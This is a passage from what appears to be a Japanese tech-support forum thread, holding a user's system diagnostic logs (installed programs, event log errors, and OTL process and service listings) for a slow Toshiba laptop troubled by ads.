"{DECEC09B-377D-4CB4-B9F9-8ABB22AAAD01}" = TOSHIBA Peak Shift Control
"{E2C24FE1-C6BB-4A4B-8B7F-BF2521DEB91E}" = Share64
"{F67FA545-D8E5-4209-86B1-AEE045D1003F}" = TOSHIBA Face Recognition
"CCleaner" = CCleaner
"CNXT_AUDIO_HDA" = Conexant HD Audio
"EPSON PX-404A" = EPSON PX-404A プリンター アンインストール
"Microsoft Visual Studio 2010 Tools for Office Runtime (x64)" = Microsoft Visual Studio 2010 Tools for Office Runtime (x64)
"Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - JPN" = Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - 日本語
"Office14.EssentialsR" = Microsoft Office 2010

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"_{E185BD5C-0E10-479F-AF44-63D3A068446A}" = Corel Digital Studio SE
"{04EEE551-38B1-4AAD-82A3-3CD6FBA7E5AF}" = Epson E-Photo
"{066CFFF8-12BF-4390-A673-75F95EFF188E}" = TOSHIBA Value Added Package
"{0A661901-E66D-4329-8B5B-BD4CD55FD430}" = 筆ぐるめ Ver.19
"{0B0F231F-CE6A-483D-AA23-77B364F75917}" = Windows Live Installer
"{0D795777-9D60-4692-8386-F2B3F2B5E5BF}" = Label@Once 1.0
"{10AB1F40-BDEC-4A8D-B427-30F9429378B0}" = Windows Live Movie Maker
"{10F63395-157F-4B93-AB4D-702A2FF11942}" = Epson Download Navigator
"{139C06F6-2DC5-485F-B34A-D333AA122379}" = セキュリティ申込・設定ツール
"{149F3A0E-5BC5-42CB-891C-8170E4BC8E9B}" = おたすけナビ
"{15D95497-8F76-41E5-8894-EDDB59E39BD9}" = Windows Live メール
"{190B5883-77C9-4738-8F0D-573076AE3E2F}" = レグザリンク・ダビング
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}" = Junk Mail filter update
"{200FEC62-3C34-4D60-9CE8-EC372E01C08F}" = Windows Live SOXE Definitions
"{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}" = Skype(TM) 7.3
"{2768E455-F18B-4765-9345-3170994BA63A}" = TOSHIBA Quad Core HD Processor Video Convert Library
"{29921033-97D8-4147-8D17-CD15EC8C89B1}" = てぶらナビ
"{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}" = Microsoft XNA Framework Redistributable 4.0
"{2C303EE0-A595-3543-A71A-931C7AC40EDE}" = Microsoft Primary Interoperability Assemblies 2005
"{3108C217-BE83-42E4-AE9E-A56A2A92E549}" = Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver
"{3336F667-9049-4D46-98B6-4C743EEBC5B1}" = Windows Live Photo Gallery
"{3361D415-BA35-4143-B301-661991BA6219}" = MyEPSON Connect
"{34C266A2-F091-4F44-B62F-FD3AA1AFD5B5}" = Epson E-Photo Plug-in for PMB(Picture Motion Browser)
"{3538E52C-C3DD-4400-97B5-CA7D155D7A91}" = PC引越ナビ
"{3C100F93-4F0E-4C32-9AEB-EFB3E2CA34F8}" = PhotoWizard
"{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}" = Intel(R) Rapid Storage Technology
"{402ED4A1-8F5B-387A-8688-997ABF58B8F2}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
"{46A192F2-4278-46D1-94D0-3FA6EAE8C9BA}" = TOSHIBA PalaDouga
"{4B360FD5-D497-46E2-9488-C6B649871662}" = Epson E-Web Print
"{4CBABDFD-49F8-47FD-BE7D-ECDE7270525A}" = Windows Live PIMT Platform
"{4D512833-B1CA-42E5-AEFD-E2E54EC50157}" = 動画で解決!操作ガイド-コンテンツ-
"{51F0CC36-5EB0-4B9E-8F97-6AE9AD81BD7A}" = PCあんしん点検ユーティリティ
"{5442DAB8-7177-49E1-8B22-09A049EA5996}" = Renesas Electronics USB 3.0 Host Controller Driver
"{54569D14-709A-4079-98B7-05F1F6133615}" = TOSHIBA 無線LANらくらく設定
"{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}" = EPSON Scan OCR コンポーネント
"{5705EC66-E894-454D-A014-ADF1DF920C10}" = いつもNAVI PC
"{5B01BCB7-A5D3-476F-AF11-E515BA206591}" = TOSHIBA Wireless LAN Indicator
"{5B3D862C-88E0-4A09-A62B-213AAEB6EC03}" = Corel DDR Move for Toshiba
"{5C55525F-B7EE-4400-8DA0-9B47655B60FA}" = 東芝プレイスガジェット用ライブラリ
"{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}" = Google Update Helper
"{617773AE-ADBA-4479-BB04-65FE7758B35C}" = TOSHIBA Wireless Display Monitor
"{62BBB2F0-E220-4821-A564-730807D2C34D}" = Realtek USB 2.0 Reader Driver
"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel(R) Management Engine Components
"{654F7484-88C5-46DC-AB32-C66BCB0E2102}" = TOSHIBA Sleep Utility
"{675D8E1E-2388-4718-902C-E5FC4888AC0E}" = Windows Live Essentials
"{682B3E4F-696A-42DE-A41C-4C07EA1678B4}" = Windows Live SOXE
"{6C3F8916-D6A5-4A31-9DA8-80C973CE437F}" = Windows Live Writer
"{6CB76C9D-80C2-4CB3-A4CD-D96B239E3F94}" = TOSHIBA Resolution+ Plug-in for Windows Media Player
"{6F3C8901-EBD3-470D-87F8-AC210F6E5E02}" = TOSHIBA Web Camera Application
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{7257132D-7F65-41E6-A90F-43BF6099461A}" = Intel(R) WiDi
"{7E4CB404-F1E4-4E81-A1CB-2CBB310481D1}" = MLE
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{88A686A9-D687-4295-B633-50D8A4B88371}" = Windows Live Writer Resources
"{8A66A2C8-0032-4949-8D99-C293A3EACF79}" = Windows Live Photo Common
"{8D59BE38-3A4F-4525-AD0D-8980E9E31EFA}" = Windows Live フォト ギャラリー
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{8ED43F7E-A8F6-4898-AF11-B6158F2EDF94}" = Epson Event Manager
"{8F178A65-9254-45B8-A7A7-3A89F1BB2B45}" = Windows Live UX Platform Language Pack
"{92EA4134-10D1-418A-91E1-5A0453131A38}" = Windows Live Movie Maker
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{9D56775A-93F3-44A3-8092-840E3826DE30}" = Windows Live Mail
"{A726AE06-AAA3-43D1-87E3-70F510314F04}" = Windows Live Writer
"{A9BDCA6B-3653-467B-AC83-94367DA3BFE3}" = Windows Live Photo Common
"{A9FD58A9-7640-4E61-B166-F5FBAD8219F6}" = TOSHIBA ConfigFree
"{AA4BF92B-2AAF-11DA-9D78-000129760D75}" = RZプレーヤー
"{AAAFC670-569B-4A2F-82B4-42945E0DE3EF}" = Windows Live Writer
"{AC6569FA-6919-442A-8552-073BE69E247A}" = TOSHIBA Service Station
"{B05B64BA-D9C8-47B9-A2CB-A1F8E796C843}" = Windows Live Messenger
"{B4AB4D19-215D-48FA-93C3-4030B7CA8152}" = おまかせフォトムービー
"{B5F9E7FC-12BA-4311-9F09-0B32F5FC910F}" = TOSHIBA SD-Video PLAYER
"{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}" = TOSHIBA Recovery Media Creator
"{C7A4F26F-F9B0-41B2-8659-99181108CDE3}" = TOSHIBA Media Controller
"{CAB75FFC-2377-4B95-A8FA-C9234B812A92}_is1" = LoiLoScope 2
"{CCF62642-ECB1-4D2B-80C0-3FD3286AEAED}" = TOSHIBA Sync Utility
"{CE95A79E-E4FC-4FFF-8A75-29F04B942FF2}" = Windows Live UX Platform
"{D0B44725-3666-492D-BEF6-587A14BD9BD9}" = MSVCRT_amd64
"{D45240D3-B6B3-4FF9-B243-54ECE3E10066}" = Windows Live Communications Platform
"{D880B6E0-7352-4517-8CAE-67E5625946AA}" = Corel DDR Move
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E1754ED2-CD39-4F5F-AC98-0271EAE1C116}" = Setup
"{E185BD5C-0E10-479F-AF44-63D3A068446A}" = ICA
"{E24A5C1E-8647-43FD-838B-DF7149D492E4}" = DeviceIO
"{E2C2F547-4C5B-45F9-8445-C59E223CCB08}" = ContentHD
"{E3C1C994-CA69-4B3C-A290-C311617DE271}" = Contents
"{E5636C06-A318-4CF3-803B-5BD9F5C10822}" = PureHD
"{E5D50A9A-B973-46DE-89E4-8BDDD8A9F988}" = Share
"{E6ABA0E9-65E7-4366-9770-514ED4341611}" = VIO
"{E7EFA8C8-4CDE-4466-8E0E-01C04589ED90}" = ISCOM
"{E7F483DB-452A-40A1-A9D5-536DE20761C5}" = 東芝プレイスガジェット
"{E91C1011-2083-4DD6-858D-11753DCDFF2D}" = Corel Direct DiscRecorder
"{EA6625D5-E563-4FE3-8D98-B3F5B64CBC67}" = IPM_OEM
"{EB496D12-70FA-44CA-8804-9BB67A221F5D}" = スタートアップツール
"{EB4DF488-AAEF-406F-A341-CB2AAA315B90}" = Windows Live Messenger
"{EDD9E0C4-B402-40DF-B33D-405CA1E23BA6}" = DFPro
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
"{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}" = Intel(R) Processor Graphics
"{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}" = TOSHIBA Media Controller Plug-in
"{F82FDF02-16D4-4DED-BD9B-66C4C0DC037D}" = 動画で解決!操作ガイド
"Adobe Flash Player NPAPI" = Adobe Flash Player 17 NPAPI
"EPSON PX-404A Useg" = EPSON PX-404A ユーザーズガイド
"EPSON Scanner" = EPSON Scan
"Google Chrome" = Google Chrome
"InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}" = TOSHIBA Value Added Package
"InstallShield_{1C8C049A-145F-4A6E-8290-B5C245EBE39D}" = TOSHIBA Bulletin Board
"InstallShield_{24811C12-F4A9-4D0F-8494-A7B8FE46123C}" = TOSHIBA ReelTime
"InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}" = Renesas Electronics USB 3.0 Host Controller Driver
"InstallShield_{6F3C8901-EBD3-470D-87F8-AC210F6E5E02}" = TOSHIBA Web Camera Application
"InstallShield_{C4FFA951-9678-4D51-84B4-AFD15D3C45AD}" = TOSHIBA Hardware Setup
"InstallShield_{CBD6B23D-41D5-4A46-8019-6208516C9712}" = TOSHIBA Supervisor Password
"InstallShield_{DECEC09B-377D-4CB4-B9F9-8ABB22AAAD01}" = 東芝ピークシフトコントロール
"InstallShield_{E91C1011-2083-4DD6-858D-11753DCDFF2D}" = Corel Direct DiscRecorder 3.7
"InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}" = TOSHIBA Face Recognition
"IObitUninstall" = IObit Uninstaller
"LAPLINK HelpDesk Client" = LAPLINK ヘルプデスク クライアント
"Malwarebytes Anti-Malware_is1" = Malwarebytes Anti-Malware バージョン 2.0.4.1028
"MyEPSON Connect" = MyEPSON Connect
"RemoteToolGuider.west_is1" = NTT西日本 リモートサポートツール
"Steam" = Steam
"Steam App 105600" = Terraria
"UN900119" = BUFFALO クライアントマネージャV
"UN900119_is1" = BUFFALO クライアントマネージャV をアンインストール
"UN900120" = BUFFALO AirStation倍速設定ツール(アンインストール)
"WinLiveSuite" = Windows Live Essentials
"診断復旧ツール_is1" = 診断復旧ツール

[color=#E56717]========== Last 20 Event Log Errors ==========[/color]

[ Application Events ]
Error - 2015/04/29 0:47:34 | Computer Name = Owner-PC | Source = WinMgmt | ID = 10
Description =

Error - 2015/04/29 2:24:21 | Computer Name = Owner-PC | Source = WinMgmt | ID = 10
Description =

Error - 2015/04/29 6:10:17 | Computer Name = Owner-PC | Source = WinMgmt | ID = 10
Description =

Error - 2015/04/29 10:08:14 | Computer Name = Owner-PC | Source = WinMgmt | ID = 10
Description =

Error - 2015/04/29 10:13:46 | Computer Name = Owner-PC | Source = WinMgmt | ID = 10
Description =

Error - 2015/04/29 10:17:10 | Computer Name = Owner-PC | Source = WinMgmt | ID = 10
Description =

Error - 2015/04/29 10:29:49 | Computer Name = Owner-PC | Source = WinMgmt | ID = 10
Description =

Error - 2015/04/29 18:03:08 | Computer Name = Owner-PC | Source = WinMgmt | ID = 10
Description =

Error - 2015/04/29 18:05:20 | Computer Name = Owner-PC | Source = WinMgmt | ID = 10
Description =

Error - 2015/04/30 7:53:39 | Computer Name = Owner-PC | Source = WinMgmt | ID = 10
Description =

[ System Events ]
Error - 2015/04/29 20:27:00 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7000
Description = Adobe Flash Player Update Service サービスを、次のエラーが原因で開始できませんでした: %%3

Error - 2015/04/29 21:27:00 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7000
Description = Adobe Flash Player Update Service サービスを、次のエラーが原因で開始できませんでした: %%3

Error - 2015/04/29 22:27:00 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7000
Description = Adobe Flash Player Update Service サービスを、次のエラーが原因で開始できませんでした: %%3

Error - 2015/04/29 23:27:00 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7000
Description = Adobe Flash Player Update Service サービスを、次のエラーが原因で開始できませんでした: %%3

Error - 2015/04/30 0:27:01 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7000
Description = Adobe Flash Player Update Service サービスを、次のエラーが原因で開始できませんでした: %%3

Error - 2015/04/30 1:27:00 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7000
Description = Adobe Flash Player Update Service サービスを、次のエラーが原因で開始できませんでした: %%3

Error - 2015/04/30 7:52:20 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7000
Description = Baidu Japanese IME Service_3.5.2.45 サービスを、次のエラーが原因で開始できませんでした: %%3

Error - 2015/04/30 7:53:26 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7000
Description = Update Hold Page サービスを、次のエラーが原因で開始できませんでした: %%3

Error - 2015/04/30 7:53:26 | Computer Name = Owner-PC | Source = Service Control Manager | ID = 7000
Description = Util Hold Page サービスを、次のエラーが原因で開始できませんでした: %%3

Error - 2015/04/30 7:55:29 | Computer Name = Owner-PC | Source = Schannel | ID = 36887
Description = 次の致命的な警告を受け取りました: 80。


< End of report >
  • T・T
  • 2015/04/30 (Thu) 21:25:00
Re: パソコン動作緩慢・広告類がひどい
OTL logfile created on: 2015/04/30 21:04:26 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Owner\Downloads
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17728)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

3.92 Gb Total Physical Memory | 1.21 Gb Available Physical Memory | 30.84% Memory free
7.83 Gb Paging File | 4.72 Gb Available in Paging File | 60.23% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 623.75 Gb Total Space | 416.02 Gb Free Space | 66.70% Space Free | Partition Type: NTFS
Drive D: | 50.00 Gb Total Space | 49.24 Gb Free Space | 98.48% Space Free | Partition Type: NTFS
Drive E: | 88.93 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: UDF

Computer Name: OWNER-PC | User Name: Owner | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2015/04/30 21:01:22 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Owner\Downloads\OTL.exe
PRC - [2015/04/28 11:07:36 | 000,812,872 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
PRC - [2014/11/21 06:12:56 | 000,969,016 | ---- | M] (Malwarebytes Corporation) -- D:\Malwarebytes Anti-Malware\mbamservice.exe
PRC - [2014/11/21 06:12:54 | 001,871,160 | ---- | M] (Malwarebytes Corporation) -- D:\Malwarebytes Anti-Malware\mbamscheduler.exe
PRC - [2014/11/21 06:12:46 | 007,229,752 | ---- | M] (Malwarebytes Corporation) -- D:\Malwarebytes Anti-Malware\mbam.exe
PRC - [2014/11/18 05:12:48 | 000,093,864 | ---- | M] (Trend Micro Inc.) -- C:\Program Files\NTTW\SECURITY\SEC\UIFramework\Toolbar\chromeextension\NativeMessageHost\ToolbarNativeMsgHost.exe
PRC - [2014/10/15 23:13:58 | 001,084,704 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
PRC - [2014/07/11 19:32:02 | 000,832,048 | ---- | M] (Trend Micro Inc.) -- C:\Program Files\NTTW\SECURITY\AMSP\module\20002\9.0.1069\9.0.1069\chrome_extension2\host\chrome_native_msg_host.exe
PRC - [2014/06/30 19:11:36 | 001,038,896 | ---- | M] (Trend Micro Inc.) -- C:\Program Files\NTTW\SECURITY\AMSP\module\20013\ChromeExt\chromeextension\TmopChromeMsgHost32.exe
PRC - [2013/09/13 15:28:58 | 002,387,520 | ---- | M] (SEIKO EPSON CORPORATION) -- C:\Program Files (x86)\epson\MyEPSON Connect\mep.exe
PRC - [2012/10/23 11:27:18 | 000,020,480 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files (x86)\TOSHIBA\Toshiba Places Digestword\PBExtractService.exe
PRC - [2012/10/01 14:53:32 | 000,696,320 | ---- | M] (SEIKO EPSON CORPORATION) -- C:\Program Files (x86)\epson\MyEPSON Connect\mepService.exe
PRC - [2011/11/08 18:23:32 | 000,087,336 | ---- | M] () -- C:\Program Files (x86)\CyberLink\RZ Player\Kernel\DMP\CLHNService.exe
PRC - [2011/11/04 04:07:46 | 000,030,064 | ---- | M] () -- c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe
PRC - [2011/11/02 20:04:42 | 000,079,808 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files (x86)\TOSHIBA\RegzaLinkDubbing\TosRzTfSvc.exe
PRC - [2011/08/18 17:12:56 | 000,113,056 | ---- | M] (CypherTec Inc.) -- C:\Program Files (x86)\Common Files\CypherTec\cgrdsrv32.exe
PRC - [2011/08/18 16:26:38 | 000,923,520 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files (x86)\TOSHIBA\Sync Utility\TosSyncScheduler.exe
PRC - [2011/07/14 22:00:50 | 000,209,784 | ---- | M] (BUFFALO INC.) -- C:\Program Files (x86)\BUFFALO\clientmgrv\bin\cmvMain.exe
PRC - [2011/07/14 22:00:50 | 000,126,328 | ---- | M] (BUFFALO INC.) -- C:\Program Files (x86)\BUFFALO\clientmgrv\bin\BWH32S.exe
PRC - [2011/06/16 17:54:56 | 000,305,080 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe
PRC - [2011/06/07 12:07:58 | 000,063,432 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSwMgr.exe
PRC - [2011/06/07 12:07:28 | 000,047,032 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe
PRC - [2011/06/01 12:14:48 | 000,223,184 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files (x86)\TOSHIBA\TKRTL\TPCHKarteSVC.exe
PRC - [2011/04/08 19:13:20 | 000,030,352 | ---- | M] (Intercom, Inc.) -- C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhuser.exe
PRC - [2011/04/08 19:11:28 | 000,051,864 | ---- | M] (Intercom, Inc.) -- C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhrcusr.exe
PRC - [2010/12/25 16:05:54 | 001,716,144 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe
PRC - [2010/12/20 18:30:38 | 002,656,280 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
PRC - [2010/12/20 18:30:36 | 000,325,656 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
PRC - [2010/11/21 12:24:03 | 000,302,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\cmd.exe
PRC - [2010/10/12 13:56:40 | 000,979,328 | ---- | M] (SEIKO EPSON CORPORATION) -- C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
PRC - [2010/06/04 16:32:58 | 000,252,792 | ---- | M] (TOSHIBA) -- C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
PRC - [2010/03/11 14:06:06 | 000,193,824 | ---- | M] (Protexis Inc.) -- c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe


[color=#E56717]========== Modules (No Company Name) ==========[/color]

MOD - [2015/04/28 11:07:34 | 001,252,680 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.135\libglesv2.dll
MOD - [2015/04/28 11:07:33 | 000,080,712 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.135\libegl.dll
MOD - [2014/11/18 05:12:46 | 000,049,152 | ---- | M] () -- C:\Program Files\NTTW\SECURITY\SEC\UIFramework\boost_thread-vc110-mt-1_49.dll
MOD - [2014/11/18 05:12:46 | 000,039,424 | ---- | M] () -- C:\Program Files\NTTW\SECURITY\SEC\UIFramework\boost_date_time-vc110-mt-1_49.dll
MOD - [2011/07/14 22:00:50 | 000,055,160 | ---- | M] () -- C:\Program Files (x86)\BUFFALO\clientmgrv\bin\BWH32SPS.dll


[color=#E56717]========== Services (SafeList) ==========[/color]

SRV:[b]64bit:[/b] - File not found [Auto | Running] -- C:\Program Files\NTTW\Security\AMSP\coreServiceShell.exe coreFrameworkHost.exe -- (Amsp)
SRV:[b]64bit:[/b] - [2015/03/13 12:54:00 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:[b]64bit:[/b] - [2014/11/18 05:13:04 | 001,187,376 | ---- | M] (Trend Micro Inc.) [Auto | Running] -- C:\Program Files\NTTW\SECURITY\SEC\plugin\Pt\PtSvcHost.exe -- (Platinum Host Service)
SRV:[b]64bit:[/b] - [2013/05/27 14:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:[b]64bit:[/b] - [2012/02/21 07:01:02 | 000,151,648 | ---- | M] (SEIKO EPSON CORPORATION) [Auto | Running] -- C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE -- (EPSON_PM_RPCV4_04)
SRV:[b]64bit:[/b] - [2011/11/08 16:56:10 | 000,583,088 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe -- (TosCoSrv)
SRV:[b]64bit:[/b] - [2011/09/22 17:20:48 | 000,294,848 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Program Files\Toshiba\TECO\TecoService.exe -- (TOSHIBA eco Utility Service)
SRV:[b]64bit:[/b] - [2011/08/18 17:13:52 | 000,127,416 | ---- | M] (CypherTec Inc.) [Auto | Running] -- C:\Program Files\Common Files\CypherTec\cgrdsrv64.exe -- (CypherGuard cguard Service 64bit Edition)
SRV:[b]64bit:[/b] - [2011/08/18 17:10:30 | 000,131,512 | ---- | M] (CypherTec Inc.) [Auto | Running] -- C:\Program Files\Common Files\CypherTec\cthwsrv64.exe -- (CypherGuard Info Service)
SRV:[b]64bit:[/b] - [2011/08/10 15:59:04 | 000,833,464 | ---- | M] (TOSHIBA Corporation) [On_Demand | Running] -- C:\Program Files\Toshiba\TPHM\TPCHSrv.exe -- (TPCHSrv)
SRV:[b]64bit:[/b] - [2011/06/09 21:10:00 | 000,138,152 | ---- | M] (TOSHIBA Corporation) [On_Demand | Running] -- C:\Program Files\Toshiba\TOSHIBA HDD SSD Alert\TosSmartSrv.exe -- (TOSHIBA HDD SSD Alert Service)
SRV:[b]64bit:[/b] - [2011/06/01 12:38:30 | 001,517,328 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Program Files\Intel\WiFi\bin\EvtEng.exe -- (EvtEng)
SRV:[b]64bit:[/b] - [2011/06/01 12:23:40 | 000,340,240 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe -- (MyWiFiDHCPDNS)
SRV:[b]64bit:[/b] - [2011/06/01 12:19:58 | 000,844,560 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe -- (RegSrvc)
SRV:[b]64bit:[/b] - [2010/10/20 14:41:00 | 000,138,656 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Windows\SysNative\TODDSrv.exe -- (TODDSrv)
SRV - [2015/03/24 13:22:24 | 000,836,288 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2015/02/18 19:11:32 | 000,315,488 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014/12/10 09:14:02 | 002,631,456 | ---- | M] (IObit) [Auto | Stopped] -- C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe -- (LiveUpdateSvc)
SRV - [2014/11/21 06:12:56 | 000,969,016 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- D:\Malwarebytes Anti-Malware\mbamservice.exe -- (MBAMService)
SRV - [2014/11/21 06:12:54 | 001,871,160 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- D:\Malwarebytes Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)
SRV - [2014/04/11 23:08:08 | 000,103,608 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2014/03/21 07:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2014/01/22 17:04:00 | 005,267,776 | ---- | M] (INCA Internet Co., Ltd.) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GameMon.des -- (npggsvc)
SRV - [2012/10/23 11:27:18 | 000,020,480 | ---- | M] (TOSHIBA CORPORATION) [Auto | Running] -- C:\Program Files (x86)\TOSHIBA\Toshiba Places Digestword\PBExtractService.exe -- (PBExtractService)
SRV - [2012/10/01 14:53:32 | 000,696,320 | ---- | M] (SEIKO EPSON CORPORATION) [Auto | Running] -- C:\Program Files (x86)\epson\MyEPSON Connect\mepService.exe -- (MyEPSON Connect Service)
SRV - [2011/11/08 18:23:32 | 000,087,336 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\CyberLink\RZ Player\Kernel\DMP\CLHNService.exe -- (CLHNService)
SRV - [2011/11/04 04:07:46 | 000,030,064 | ---- | M] () [Auto | Running] -- c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe -- (UDSS)
SRV - [2011/11/02 20:04:42 | 000,079,808 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Program Files (x86)\TOSHIBA\RegzaLinkDubbing\TosRzTfSvc.exe -- (TosRzTfSvc)
SRV - [2011/08/18 17:12:56 | 000,113,056 | ---- | M] (CypherTec Inc.) [Auto | Running] -- C:\Program Files (x86)\Common Files\CypherTec\cgrdsrv32.exe -- (CypherGuard cguard Service 32bit Edition)
SRV - [2011/07/14 22:00:50 | 000,126,328 | ---- | M] (BUFFALO INC.) [Auto | Running] -- C:\Program Files (x86)\BUFFALO\clientmgrv\bin\BWH32S.exe -- (BWH32S)
SRV - [2011/07/11 17:16:06 | 000,057,216 | ---- | M] (TOSHIBA Corporation) [On_Demand | Running] -- C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe -- (TMachInfo)
SRV - [2011/06/29 10:44:04 | 000,008,704 | ---- | M] (Intercom, Inc.) [Auto | Running] -- C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\LLHDCldr.exe -- (LLHDCloader)
SRV - [2011/06/21 13:44:06 | 000,304,272 | ---- | M] (Intercom, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\LLHDClient.exe -- (LLHDClient)
SRV - [2011/06/07 12:08:26 | 000,250,296 | ---- | M] (TOSHIBA CORPORATION) [Auto | Running] -- C:\Program Files (x86)\TOSHIBA\ConfigFree\CFIWmxSvcs64.exe -- (cfWiMAXService)
